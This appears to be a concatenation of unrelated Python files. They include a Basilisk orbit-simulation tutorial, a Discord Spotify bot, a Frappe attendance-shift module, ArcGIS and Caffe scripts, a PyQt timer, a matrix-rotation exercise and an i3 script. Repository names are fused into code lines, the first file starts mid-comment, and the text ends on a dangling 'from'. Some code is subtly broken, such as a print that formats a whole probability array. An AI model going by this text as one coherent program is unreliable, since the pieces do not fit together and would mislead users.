This means the rotational motion # remains at a default inertial frame orientation in this scenario. There is no appreciable speed hit to # simulate both the orbital and rotational motion for a single rigid body. In the later scenarios # the rotational motion is engaged by specifying rotational initial conditions, as well as rotation # related effectors. In this simple scenario only translational motion is set up and tracked. # Further, the default spacecraft parameters, such as the unit mass and the principal inertia values, are # just fine for this orbit simulation as they don't impact the orbital dynamics in this case. # This is true for all gravity-force-only orbital simulations. Later # tutorials, such as [scenarioAttitudeFeedback.py](@ref scenarioAttitudeFeedback), # illustrate how to over-ride default values with desired simulation values. # # Next, this module is attached to the simulation process #~~~~~~~~~~~~~~~~~{.py} # scSim.AddModelToTask(simTaskName, scObject) #~~~~~~~~~~~~~~~~~ # The first step to adding gravity objects is to create the gravity body factory class. Note that # this call will create an empty gravitational body list each time this script is called. Thus, there # is no need to clear any prior list of gravitational bodies. #~~~~~~~~~~~~~~~~~{.py} # gravFactory = simIncludeGravBody.gravBodyFactory() #~~~~~~~~~~~~~~~~~ # To attach an Earth gravity model to this spacecraft, the following macro is invoked: #~~~~~~~~~~~~~~~~~{.py} # planet = gravFactory.createEarth() # planet.isCentralBody = True # ensure this is the central gravitational body #~~~~~~~~~~~~~~~~~ # The gravBodyFactory() class stores the Earth gravitational object within the class, but it also returns a # handler to this gravitational object as a convenience. The celestial object position and velocity # vectors are all defaulted to zero values. If non-zero values are required, this can be manually # overridden. If multiple bodies are simulated, then their positions can be # dynamically updated. See [scenarioOrbitMultiBody.py](@ref scenarioOrbitMultiBody) to learn how this is # done via a SPICE object. # # If extra customization is required, see the createEarth() macro to change additional values. # For example, the spherical harmonics are turned off by default. To engage them, the following code # is used #~~~~~~~~~~~~~~~~~{.py} # planet.useSphericalHarmParams = True # simIncludeGravBody.loadGravFromFile(Basilisk.__path__[0]+'/supportData/LocalGravData/GGM03S-J2-only.txt' # , planet.spherHarm # ,2 # ) #~~~~~~~~~~~~~~~~~ # The value 2 indicates that the first two harmonics, excluding the 0th order harmonic, # are included. This harmonics data file only includes a zeroth order and J2 term. # # Finally, the gravitational body must be connected to the spacecraft object. This is done with #~~~~~~~~~~~~~~~~~{.py} # scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values()) #~~~~~~~~~~~~~~~~~ # Here the complete list of gravitational bodies is automatically assigned to the spacecraft, regardless of whether # it is only one body like Earth or Mars, or a list of multiple bodies. # # Note that the default planet's position and velocity vectors in the gravitational body are set to zero. If # alternate position or velocity vectors are required, this can be done by creating the planet ephemeris message # that is connected to the gravity effector input message `bodyInMsgName`. # If time-varying planet ephemeris messages are to be included, use the Spice module. 
For non-zero messages # the planet's default ephemeris would be replaced with the desired custom values. How to use Spice to setup # planet ephemerise is shown in the tutorial # [scenarioOrbitMultiBody.py](@ref scenarioOrbitMultiBody). # # To set the spacecraft initial conditions, the following initial position and velocity variables are set: #~~~~~~~~~~~~~~~~~{.py} # scObject.hub.r_CN_NInit = unitTestSupport.np2EigenVectorXd(rN) # m - r_CN_N # scObject.hub.v_CN_NInit = unitTestSupport.np2EigenVectorXd(vN) # m/s - v_CN_N #~~~~~~~~~~~~~~~~~ # These vectors specify the inertial position and velocity vectors relative to the planet of the # spacecraft center of mass location. Note that there are 2 points that can be tracked. The user always # specifies the spacecraft center of mass location with the above code. If the simulation output should be # about another body fixed point B, this can be done as well. This is useful in particular with more challenging # dynamics where the center of mass moves relative to the body. The following vector would specify the location of # the spacecraft hub center of mass (Bc) relative to this body fixed point. # ~~~~~~~~~~~~~~~~{.py} # scObject.hub.r_BcB_B = [[0.0], [0.0], [1.0]] # ~~~~~~~~~~~~~~~~ # If this vector is not specified, as in this tutorial scenario, then it defaults to zero. If only a rigid hub # is modeled, the Bc (hub center of mass) is the same as C (spacecraft center of mass). If the spacecrat contains # state effectors such as hinged panels, fuel slosh, imbalanced reaction wheels, etc., then the points Bc and C would # not be the same. Thus, in this simple simulation the body fixed point B and spacecraft center of mass are # identical. # # Before the simulation is ready to run, it must be initialized. The following code uses a convenient macro routine # which initializes each BSK module (run self init, cross init and reset) and clears the BSK logging stack. #~~~~~~~~~~~~~~~~~{.py} # scSim.InitializeSimulationAndDiscover() #~~~~~~~~~~~~~~~~~ # If there are messages that are shared across multiple BSK threads, as shown in # [scenarioAttitudeFeedback2T.py](@ref scenarioAttitudeFeedback2T), then this routine also # auto-discovers these shared messages. # # Setup 1 # ----- # # Which scenario is run is controlled at the bottom of the file in the code # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'LEO', # orbit Case # False, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # The first 2 arguments can be left as is. The last 2 arguments control the # simulation scenario flags to turn on or off certain simulation conditions. The default # scenario places the spacecraft about the Earth in a LEO orbit and without considering # gravitational spherical harmonics. The # resulting position coordinates and orbit illustration are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1LEO0Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2LEO0Earth.svg "Orbit Illustration") # # Setup 2 # ----- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'GTO', # orbit Case # False, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates an elliptical Geosynchronous Transfer Orbit (GTO) with zero orbit # inclination. 
The # resulting position coordinates and orbit illustration are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1GTO0Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2GTO0Earth.svg "Orbit Illustration") # # Setup 3 # ----- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'GEO', # orbit Case # False, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates a circular Geosynchronous Orbit (GEO) with zero orbit # inclination. The # resulting position coordinates and orbit illustration are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1GEO0Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2GEO0Earth.svg "Orbit Illustration") # # Setup 4 # ----- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'LEO', # orbit Case # True, # useSphericalHarmonics # 'Earth' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates a circular LEO with a non-zero orbit # inclination. In this case the Earth's spherical harmonics are turned on. The # resulting position coordinates and semi-major axis time histories are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1LEO1Earth.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2LEO1Earth.svg "Orbit Illustration") # # Setup 5 # ------- # # The next scenario is run by changing the bottom of the file in the scenario code to read # ~~~~~~~~~~~~~{.py} # if __name__ == "__main__": # run( False, # save figures to file # True, # show_plots # 'LEO', # orbit Case # True, # useSphericalHarmonics # 'Mars' # planet Case # ) # ~~~~~~~~~~~~~ # This case illustrates a circular Low Mars Orbit (LMO) with a non-zero orbit # inclination. If you wish to visualize this simulation, be sure to change the celestial object name in #~~~~~~~~~~~~~~{.py} # unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'mars') # # The Viz only supports 'earth', 'mars', or 'sun' #~~~~~~~~~~~~~~ # from 'earth' to 'mars'. In this simulation setup the planet's spherical harmonics are turned on. The # resulting position coordinates and semi-major axis time histories are shown below. # ![Inertial Position Coordinates History](Images/Scenarios/scenarioBasicOrbit1LEO0Mars.svg "Position history") # ![Perifocal Orbit Illustration](Images/Scenarios/scenarioBasicOrbit2LEO0Mars.svg "Orbit Illustration") # ## @} def run(show_plots, orbitCase, useSphericalHarmonics, planetCase): '''Call this routine directly to run the tutorial scenario.''' # Create simulation variable names simTaskName = "simTask" simProcessName = "simProcess" # Create a sim module as an empty container scSim = SimulationBaseClass.SimBaseClass() scSim.TotalSim.terminateSimulation() # # create the simulation process # dynProcess = scSim.CreateNewProcess(simProcessName) # create the dynamics task and specify the integration update time simulationTimeStep = macros.sec2nano(10.) 
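# macros.sec2nano() converts the 10 s dynamics update period into Basilisk's internal integer-nanosecond time representation; the task created below will tick at this rate.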
dynProcess.addTask(scSim.CreateNewTask(simTaskName, simulationTimeStep)) # if this scenario is to interface with the BSK Viz, uncomment the following line # unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'earth') # The Viz only supports 'earth', 'mars', or 'sun' # # setup the simulation tasks/objects # # initialize spacecraftPlus object and set properties scObject = spacecraftPlus.SpacecraftPlus() scObject.ModelTag = "spacecraftBody" # add spacecraftPlus object to the simulation process scSim.AddModelToTask(simTaskName, scObject) # setup Gravity Body gravFactory = simIncludeGravBody.gravBodyFactory() if planetCase == 'Mars': planet = gravFactory.createMarsBarycenter() planet.isCentralBody = True # ensure this is the central gravitational body if useSphericalHarmonics: planet.useSphericalHarmParams = True simIncludeGravBody.loadGravFromFile(bskPath + '/supportData/LocalGravData/GGM2BData.txt', planet.spherHarm, 100) else: # Earth planet = gravFactory.createEarth() planet.isCentralBody = True # ensure this is the central gravitational body if useSphericalHarmonics: planet.useSphericalHarmParams = True simIncludeGravBody.loadGravFromFile(bskPath + '/supportData/LocalGravData/GGM03S-J2-only.txt', planet.spherHarm, 2) mu = planet.mu # attach gravity model to spacecraftPlus scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values()) # # setup orbit and simulation time # # setup the orbit using classical orbit elements oe = orbitalMotion.ClassicElements() rLEO = 7000. * 1000 # meters rGEO = 42000. * 1000 # meters if orbitCase == 'GEO': oe.a = rGEO oe.e = 0.00001 oe.i = 0.0 * macros.D2R elif orbitCase == 'GTO': oe.a = (rLEO + rGEO) / 2.0 oe.e = 1.0 - rLEO / oe.a oe.i = 0.0 * macros.D2R else: # LEO case, default case 0 oe.a = rLEO oe.e = 0.0001 oe.i = 33.3 * macros.D2R oe.Omega = 48.2 * macros.D2R oe.omega = 347.8 * macros.D2R oe.f = 85.3 * macros.D2R rN, vN = orbitalMotion.elem2rv(mu, oe) oe = orbitalMotion.rv2elem(mu, rN, vN) # this stores consistent initial orbit elements # with circular or equatorial orbit, some angles are arbitrary # # initialize Spacecraft States with the initialization variables # scObject.hub.r_CN_NInit = unitTestSupport.np2EigenVectorXd(rN) # m - r_BN_N scObject.hub.v_CN_NInit = unitTestSupport.np2EigenVectorXd(vN) # m/s - v_BN_N # set the simulation time n = np.sqrt(mu / oe.a / oe.a / oe.a) P = 2. * np.pi / n if useSphericalHarmonics: simulationTime = macros.sec2nano(3. * P) else: simulationTime = macros.sec2nano(0.75 * P) # # Setup data logging before the simulation is initialized # if useSphericalHarmonics: numDataPoints = 400 else: numDataPoints = 100 samplingTime = simulationTime / (numDataPoints - 1) scSim.TotalSim.logThisMessage(scObject.scStateOutMsgName, samplingTime) # # initialize Simulation: This function clears the simulation log, and runs the self_init() # cross_init() and reset() routines on each module. # If the routine InitializeSimulationAndDiscover() is run instead of InitializeSimulation(), # then all messages that are shared across different BSK threads are auto-discovered. 
# scSim.InitializeSimulationAndDiscover() # # configure a simulation stop time time and execute the simulation run # scSim.ConfigureStopTime(simulationTime) scSim.ExecuteSimulation() # # retrieve the logged data # posData = scSim.pullMessageLogData(scObject.scStateOutMsgName + '.r_BN_N', range(3)) velData = scSim.pullMessageLogData(scObject.scStateOutMsgName + '.v_BN_N', range(3)) np.set_printoptions(precision=16) # # plot the results # fileName = os.path.basename(os.path.splitext(__file__)[0]) # draw the inertial position vector components plt.close("all") # clears out plots from earlier test runs plt.figure(1) fig = plt.gcf() ax = fig.gca() ax.ticklabel_format(useOffset=False, style='plain') for idx in range(1, 4): plt.plot(posData[:, 0] * macros.NANO2SEC / P, posData[:, idx] / 1000., color=unitTestSupport.getLineColor(idx, 3), label='$r_{BN,' + str(idx) + '}$') plt.legend(loc='lower right') plt.xlabel('Time [orbits]') plt.ylabel('Inertial Position [km]') figureList = {} pltName = fileName + "1" + orbitCase + str(int(useSphericalHarmonics))+ planetCase figureList[pltName] = plt.figure(1) if useSphericalHarmonics is False: # draw orbit in perifocal frame b = oe.a * np.sqrt(1 - oe.e * oe.e) p = oe.a * (1 - oe.e * oe.e) plt.figure(2, figsize=np.array((1.0, b / oe.a)) * 4.75, dpi=100) plt.axis(np.array([-oe.rApoap, oe.rPeriap, -b, b]) / 1000 * 1.25) # draw the planet fig = plt.gcf() ax = fig.gca() if planetCase == 'Mars': planetColor = '#884400' else: planetColor = '#008800' planetRadius = planet.radEquator / 1000 ax.add_artist(plt.Circle((0, 0), planetRadius, color=planetColor)) # draw the actual orbit rData = [] fData = [] for idx in range(0, len(posData)): oeData = orbitalMotion.rv2elem(mu, posData[idx, 1:4], velData[idx, 1:4]) rData.append(oeData.rmag) fData.append(oeData.f + oeData.omega - oe.omega) plt.plot(rData * np.cos(fData) / 1000, rData * np.sin(fData) / 1000, color='#aa0000', linewidth=3.0 ) # draw the full osculating orbit from the initial conditions fData = np.linspace(0, 2 * np.pi, 100) rData = [] for idx in range(0, len(fData)): rData.append(p / (1 + oe.e * np.cos(fData[idx]))) plt.plot(rData * np.cos(fData) / 1000, rData * np.sin(fData) / 1000, '--', color='#555555' ) plt.xlabel('$i_e$ Cord. [km]') plt.ylabel('$i_p$ Cord. [km]') plt.grid() else: plt.figure(2) fig = plt.gcf() ax = fig.gca() ax.ticklabel_format(useOffset=False, style='plain') smaData = [] for idx in range(0, len(posData)): oeData = orbitalMotion.rv2elem(mu, posData[idx, 1:4], velData[idx, 1:4]) smaData.append(oeData.a / 1000.) plt.plot(posData[:, 0] * macros.NANO2SEC / P, smaData, color='#aa0000', ) plt.xlabel('Time [orbits]') plt.ylabel('SMA [km]') pltName = fileName + "2" + orbitCase + str(int(useSphericalHarmonics)) + planetCase figureList[pltName] = plt.figure(2) if show_plots: plt.show() # close the plots being saved off to avoid over-writing old and new figures plt.close("all") return posData, figureList # # This statement below ensures that the unit test scrip can be run as a # stand-along python script # if __name__ == "__main__": run( True, # show_plots 'LEO', # orbit Case (LEO, GTO, GEO) True, # useSphericalHarmonics 'Earth' # planetCase (Earth, Mars) ) bgildson/brote-seed # -*- coding: utf-8 -*- from flask_sqlalchemy import SQLAlchemy db = SQLAlchemy() # registra models da aplicacao from . import auth from . import meta from . import pessoa from . import revoked_token from . 
import usuario Elthan/discord-spotify-bot #!/usr/bin/env python3.5 from discord.ext import commands from cogs.utils import ClearQueue from cogs import config from cogs import music from cogs import search import asyncio import discord import logging import spotify import threading description = '''A bot for playing music from Spotify.''' logging.basicConfig(level=logging.INFO) bot = commands.Bot(command_prefix=config.prefix, description=description) @bot.event async def on_ready(): print('Logged in as') print(bot.user.name) print(bot.user.id) print('------') # SETUP # logged_in_event = threading.Event() def connection_state_listener(session): if session.connection.state is spotify.ConnectionState.LOGGED_IN: logged_in_event.set() session = spotify.Session() loop = spotify.EventLoop(session) loop.start() session.on( spotify.SessionEvent.CONNECTION_STATE_UPDATED, connection_state_listener ) session.login(config.user, config.secret) logged_in_event.wait() print(session.user) session.preferred_bitrate(spotify.Bitrate.BITRATE_320k) playlist = ClearQueue() bot.add_cog(search.Search(bot, session, playlist)) bot.add_cog(music.Music(bot, session, playlist)) bot.run(config.token) scripts/portal/kine_goSub4.py # Created by MechAviv # Kinesis Introduction # Map ID :: 331003200 # Subway :: Subway Car #3 GIRL = 1531067 sm.removeNpc(GIRL) sm.warpInstanceIn(331003300, 0)vs_example.py ''' Comparison of Continuous No-Regret Algorithms @date: May 26, 2015 ''' # Set up infrastructure and basic problem parameters import matplotlib as mpl mpl.use('Agg') # this is needed when running on a linux server over terminal import multiprocessing as mp import numpy as np import datetime, os import pickle from ContNoRegret.Domains import nBox, UnionOfDisjointnBoxes, DifferenceOfnBoxes, unitbox, hollowbox, vboxes, vL from ContNoRegret.LossFunctions import QuadraticLossFunction, random_QuadraticLosses from ContNoRegret.NoRegretAlgos import ContNoRegretProblem from ContNoRegret.utils import CNR_worker, plot_results, save_results, circular_tour from ContNoRegret.animate import save_animations from ContNoRegret.Potentials import (ExponentialPotential, IdentityPotential, pNormPotential, ExpPPotential, pExpPotential, FractionalLinearPotential) # this is the location of the folder for the results results_path = '' desc = 'NIPS2_CNR_vs' tmpfolder = '/Volumes/tmp/' # if possible, choose this to be a RamDisk # some flags for keeping a record of the simulation parameters save_res = True show_plots = False save_anims = True show_anims = False T = 2500 # Time horizon M = 10.0 # Uniform bound on the function (in the dual norm) L = 5.0 # Uniform bound on the Lipschitz constant N = 2500 # Number of parallel algorithm instances Ngrid = 250000 # Number of gridpoints for the sampling step vs = [0.50]#, 0.50, 0.25, 0.10, 0.05] doms, paths = [], [] for v in vs: d,p = vL(v, Npath=T, epsilon=0.15) doms.append(d) paths.append(p) # before running the computation, read this file so we can later save a copy in the results folder with open(__file__, 'r') as f: thisfile = f.read() problems = [] # loop over the domains with different vs for dom,path in zip(doms, paths): lossfuncs, Mnew, lambdamax = random_QuadraticLosses(dom, path, L, M, pd=True) # create the problem problems.append(ContNoRegretProblem(dom, lossfuncs, L, Mnew, desc=desc)) # Select a couple of potentials for the Dual Averaging algorithm potentials = [pNormPotential(1.05), pNormPotential(1.75)] alpha, theta = potentials[0].alpha_opt(dom.n), potentials[0].theta_opt(dom, M) etas = 
theta*(1+np.arange(T))**(-alpha) # the following runs fine if the script is the __main__ method, # but crashes when running from ipython pool = mp.Pool(mp.cpu_count()-1) processes = [] for i,prob in enumerate(problems): for pot in potentials: processes.append(pool.apply_async(CNR_worker, (prob, N,'DA'), {'opt_rate':False, 'Ngrid':Ngrid, 'potential':pot, 'pid':len(processes), 'tmpfolder':tmpfolder, 'etas':etas, 'label':'v={0:.2f}, '.format(prob.domain.v)+pot.desc, 'animate':[]})) # wait for the processes to finish an collect the results (as file handlers) results = [process.get() for process in processes] # plot results and/or save a persistent copy (pickled) of the detailed results timenow = datetime.datetime.now().strftime('%Y-%m-%d_%H-%M')# create a time stamp for unambiguously naming the results folder results_directory = '{}{}/'.format(results_path, timenow) if save_res: os.makedirs(results_directory, exist_ok=True) # this could probably use a safer implementation plot_results(results, 100, results_directory, show_plots) if save_anims: save_animations(results, 10, results_directory, show_anims) save_results(results, results_directory) # store the previously read-in contents of this file in the results folder with open(results_directory+str(__file__), 'w') as f: f.write(thisfile) else: plot_results(results, offset=100) # -*- coding: utf-8 -*- # Copyright (c) 2019, MIS and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe import _ from frappe.model.document import Document class AttendanceShift(Document): @frappe.whitelist() def assign_attendance_shift( self, grade=None, department=None, designation=None, employee=None, from_date=None, ): employees = self.get_employees( grade=grade, department=department, designation=designation, name=employee ) # assign attendance shift if employees: if len(employees) > 20: frappe.enqueue( assign_attendance_shift_for_employee, timeout=600, employees=employees, attendance_shift=self, from_date=from_date, ) else: assign_attendance_shift_for_employee( employees, self, from_date=from_date ) else: frappe.msgprint(_("No Employee Found")) def get_employees(self, **kwargs): conditions, values = [], [] for field, value in kwargs.items(): if value: conditions.append("{0}=%s".format(field)) values.append(value) condition_str = " and " + " and ".join(conditions) if conditions else "" employees = frappe.db.sql_list( "select name from tabEmployee " "where status='Active'{condition}".format(condition=condition_str), tuple(values), ) return employees def assign_attendance_shift_for_employee(employees, attendance_shift, from_date=None): attendance_shift_assignments = [] count = 0 for employee in employees: count += 1 assignment = create_attendance_shift_assignment( employee, attendance_shift, from_date ) attendance_shift_assignments.append(assignment) frappe.publish_progress( count * 100 / len(employees), title=_("Assigning Attendance Shift") ) if attendance_shift_assignments: frappe.msgprint(_("Structures have been assigned successfully")) def create_attendance_shift_assignment(employee, attendance_shift, from_date): assignment = frappe.new_doc("Attendance Shift Assignment") assignment.employee = employee assignment.attendance_shift = attendance_shift.name assignment.from_date = from_date assignment.save(ignore_permissions=True) assignment.submit() return assignment.name codeRimoe/homework # -*- coding: utf-8 -*- # Name: t104.py [Point(shp) Statistics] # Description: This is a script to 
gather statistics of point files(shp). # A csv file will be returned. # Counting the Mean_DBH, Min_DBH, ax_DBH, Mean_H, Min_H, Max_H of # every plot. # # Author: , SYSU # E-mail: # License: http://www.apache.org/licenses/ # # Reference: # Arcgis Help import arcgisscripting inf = '../rsgis/data/data5/plot_data.shp' out = '../rsgis/process/t104/plot_data.csv' gp = arcgisscripting.create() cur = gp.SearchCursor(inf) row = cur.Next() with open(out, 'w') as f: f.write('Plot_ID,Mean_DBH,Min_DBH,Max_DBH,Mean_H,Min_H,Max_H') while row: curP = row.GetValue('PLOT') arrD = [0, 999, 0] arrH = [0, 999, 0] N = 0 try: while row.GetValue('PLOT') == curP: if row.GetValue('PT_TYPE') == 'Tree': DBH = row.GetValue('DBH') HEIGHT = row.GetValue('HEIGHT') N += 1 arrD[0] += DBH arrH[0] += HEIGHT if DBH < arrD[1]: arrD[1] = DBH if DBH > arrD[2]: arrD[2] = DBH if HEIGHT < arrH[1]: arrH[1] = HEIGHT if HEIGHT > arrH[2]: arrH[2] = HEIGHT row = cur.Next() if N: arrD[0] /= N arrH[0] /= N f.write('\n' + str(curP) + ',' + str(arrD[0]) + ',' + str(arrD[1]) + ',' + str(arrD[2]) + ',' + str(arrH[0]) + ',' + str(arrH[1]) + ',' + str(arrH[2])) except: pass raw_input('Press to exit...') FreekDS/git-ci-analyzertests/CIDetector/test_TravisDetector.py from analyzer.Repository.TestRepo import TestRepo from analyzer.CIDetector.TravisDetector import TravisDetector, TRAVIS_CI def test_execute_happyday(): repo = TestRepo('FreekDS/git-ci-analyzer') detector = TravisDetector() res = detector.execute(repo) assert res is not None assert res == TRAVIS_CI def test_execute_non_existing_repo(): repo = TestRepo('doesnt-exist/repository') detector = TravisDetector() res = detector.execute(repo) assert res != TRAVIS_CI assert res is None def test_execute_travis_inactive(): repo = TestRepo('FreekDS/MSI-Mystic-Light-Controller', repo_type='github') detector = TravisDetector() res = detector.execute(repo) assert res != TRAVIS_CI assert res is None scripts/solve.py from export_env_variables import * from defs import * from utils import * import utils # def mid_training_prediction_from_val_txt_with_deploy(caffe, deploy_net, transformer, imgs_file, data_dir, mean_binaryproto): # # net = deploy_net # # # ### 3. CPU classification # # # # * Now we're ready to perform classification. Even though we'll only classify one image, we'll set a batch size of 50 to demonstrate batching. # # # In[6]: # # # set the size of the input (we can skip this if we're happy # # with the default; we can also change it later, e.g., for different batch sizes) # # !!!!!!!!!!!!!!1 This only made it predict 32 time for the same image # # net.blobs['data'].reshape(32, # batch size # # 3, # 3-channel (BGR) images # # CLASSIFICATION_IMAGE_SIZE, CLASSIFICATION_IMAGE_SIZE) # image size is 227x227 # # correct = 0 # count = 1 # # in my case, I'm reading the images file names from val.txt. # with open(imgs_file, "r") as f: # val_images = f.readlines() # # print("Net blobs Data shape (transformed image should correspond in chan, height, width) ", net.blobs['data'].data.shape) # # for image_name_n_label in val_images: # if len(image_name_n_label.split(' ')) != 2: # continue # # # in val.txt every line contains - filename label # image_file, label = data_dir + "/" + image_name_n_label.split(' ')[0], int(image_name_n_label.split(' ')[1]) # # image = caffe.io.load_image(image_file) # # # # image shape is (3, 256, 256). we want it (3, 227, 227) for caffenet. 
# # asking about shape[0] and shape[1] because I can't know if the image is (chan, h, w) or (h, w, chan) # if image.shape[0] == TRAINING_IMAGE_SIZE or image.shape[1] == TRAINING_IMAGE_SIZE or image.shape[2] == TRAINING_IMAGE_SIZE: # # I'm cropping the numpy array on the fly so that I don't have to mess with resizing # # the actual images in a separate folder each time. # image = center_crop_image(image, CLASSIFICATION_IMAGE_SIZE, CLASSIFICATION_IMAGE_SIZE) # # # try: # transformed_image = transformer.preprocess('data', image) # except: # # try to transpose and again # image = image.transpose(2,0,1) # (height, width, chan) -> (chan, height, width) # transformed_image = transformer.preprocess('data', image) # # # # copy the image data into the memory allocated for the net # net.blobs['data'].data[...] = transformed_image # # ### perform classification # output = net.forward(start='conv1') # # output_prob = output['prob'][0] # the output probability vector for the first image in the batch # max_prob = max(output_prob) # # predicted_label = output_prob.argmax() # # if predicted_label == label: # correct += 1 # # print(str(count) + " " + image_file + " " + str(label) + " " + str(predicted_label) + " " + "{:.2f}".format(max_prob)) # count += 1 # # # misclassified.close() # # # ------------------------------------------------------------------------------------------------------- def get_image_n_label_from_blob(net, image_index): return net.blobs['data'].data[image_index].copy(), np.array(net.blobs['label'].data, dtype=np.int32)[image_index], # ------------------------------------------------------------------------------------------------------- def predict_for_one_image_using_test_net(caffe, net, image, ground_truth, labels, num_of_classes): net.blobs['data'].data[0, ...] = image probs = net.forward(start='conv1')['prob'][0] top_k = (-probs).argsort()[:num_of_classes] print("ground truth: {}".format(labels[ground_truth])) for i,p in enumerate(top_k): print("{}. label: {:<20}. pred {:.2f}".format(i, labels[p], 100*probs)) print("") if (top_k[0] == ground_truth): print("success") return True else: print("fail") return False # ------------------------------------------------------------------------------------------------------- def solve(iterations, solver_prototxt, weights, display_iter, test_iter, val_txt, mean_binaryproto, data_dir, solverstate=None): """Run solvers for niter iterations, returning the loss and accuracy recorded each iteration. 
`solvers` is a list of (name, solver) tuples.""" # print(val_txt) # with open(val_txt) as f: # lines = f.readlines() # num_of_val_imgs = len([line for line in lines if line != ""]) # print(num_of_val_imgs) # return sys.path.append(pycaffe_module_path) caffe = import_caffe() # g_log = open(mode.log.replace(".log", "_manual.log") , "w") # mode.state = "pycaffe" solver = caffe.get_solver(solver_prototxt) if solverstate is not None: solver.restore(solverstate) print("using weights ", os.path.basename(weights)) solver.net.copy_from(weights) print("starting from iteration ", solver.iter) train_loss, val_loss, acc = [], [], [] for _ in range(iterations): if solver.iter % display_iter == 0: train_loss.append(solver.net.blobs['loss'].data.copy()) image, label = get_image_n_label_from_blob(solver.net, 0) print("image from data\n",image) print(label) if solver.iter % test_iter == 0: # solver.test_nets[0].forward() # solver.net.forward() # out = solver.test_nets[0].forward() # print(out) # print(out['prob']) val_labels = list(solver.test_nets[0].blobs['label'].data.copy().astype(np.int)) val_propabilities = solver.test_nets[0].blobs['prob'].data.copy() predicted = [tup.argmax() for tup in val_propabilities] print("labels ", val_labels) print("predictions ", predicted) val_loss.append(solver.test_nets[0].blobs['loss'].data.copy()) acc.append(solver.test_nets[0].blobs['accuracy'].data.copy()) # # pred_label = np.array(solver.test_nets[0].blobs['loss'], dtype=np.int32)[0] # # image, label = get_image_n_label_from_blob(solver.test_nets[0], 0) # predict_for_one_image_using_test_net(caffe, solver.test_nets[0], image, label, ['healthy', 'kc'], num_of_classes=2) # filters = solver.net.params['conv1'][0].data # show_blobs(filters.transpose(0, 2, 3, 1)) # feat = solver.net.blobs['conv2'].data[0, :36] # feat = solver.net.blobs['data'].data[0] # show_blobs(feat) # check_for_overfitting(loss, acc) # step here because we want to test in iteration 0 as well!! 
solver.step(1) # run a single SGD step in Caffe # ------------------------------------------------------------------------------------------------------- if __name__=="__main__": iterations = int(sys.argv[1]) solver_prototxt = sys.argv[2] weights = sys.argv[3] display_iter = int(sys.argv[4]) test_iter = int(sys.argv[5]) val_txt = sys.argv[6] mean_binaryproto = sys.argv[7] data_dir = sys.argv[8] solve(iterations, solver_prototxt, weights, display_iter, test_iter, val_txt, mean_binaryproto, data_dir)LairdStreak/MyPyPlayGround0 import sys from PyQt5.QtWidgets import QWidget, QLabel, QVBoxLayout, QApplication from PyQt5 import QtCore from PyQt5.QtCore import Qt from PyQt5.QtCore import pyqtSlot class Window(QWidget): def __init__(self, parent=None): super(Window, self).__init__(parent) self.setStyleSheet('QWidget { background-color: white; }') # counter self.counter = 10 # timer self.timer = QtCore.QTimer(self) self.timer.timeout.connect(self.timeout) # timeout signal self.timer.start(1000) # updates every second # label self.label = QLabel(self) self.label.setNum(self.counter) self.label.setAlignment(Qt.AlignCenter) # centered self.label.setStyleSheet('QLabel { color: black; }') # label's font font = self.label.font() font.setPointSize(80) self.label.setFont(font) # vertical box layout vlayout = QVBoxLayout() vlayout.addWidget(self.label) self.setLayout(vlayout) # timeout slot @pyqtSlot() def timeout(self): self.counter -= 1 self.label.setNum(self.counter) if self.counter <= 0: self.label.setText('GO!') self.timer.stop() application = QApplication(sys.argv) # window window = Window() window.setWindowTitle('Timer') window.resize(220, 220) window.show() sys.exit(application.exec_())# Question: Write a code to rotate a square matrix (90 degrees clockwise) """ 1 2 3 7 4 1 4 5 6 ----> 8 5 2 7 8 9 9 6 3 """ # def rotate_matrix(arr): # # swap the corners # last=len(arr[0]) # # tmp = arr[0][0] # # arr[0][0] = arr[0][len] # # arr[0][len] = tmp # for i in range(last): # for j in range(last): # tmp = arr[i,j] # arr[i,j] = a # arr[i+1,j] = arr[i,j] import numpy as np my_array = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) print(my_array) def rotate_matrix(matrix): n = len(matrix) for layer in range(n//2): first = layer last = n - layer - 1 for i in range(first, last): # save top element top = matrix[layer][i] # move left element to top matrix[layer][i] = matrix[-i-1][layer] # move bottom element to left matrix[-i-1][layer] = matrix[-layer-1][-i-1] # move right element to bottom matrix[-layer-1][-i-1] = matrix[i][-layer-1] # move top element to right matrix[i][-layer-1] = top return matrix print(rotate_matrix(my_array)) #!/usr/bin/env python3 import i3ipc i3 = i3ipc.Connection() cons = i3.get_tree().find_focused().workspace().nodes for con in cons: children = con.descendants() if not children: print(con.name, con.percent) else: print(con.layout, con.percent) indents = 1 for child in children: if child.name is None: print("\t" * indents, child.layout, child.percent) indents += 1 else: print("\t" * indents, child.name, child.percent) jtviegas/config-resolver from 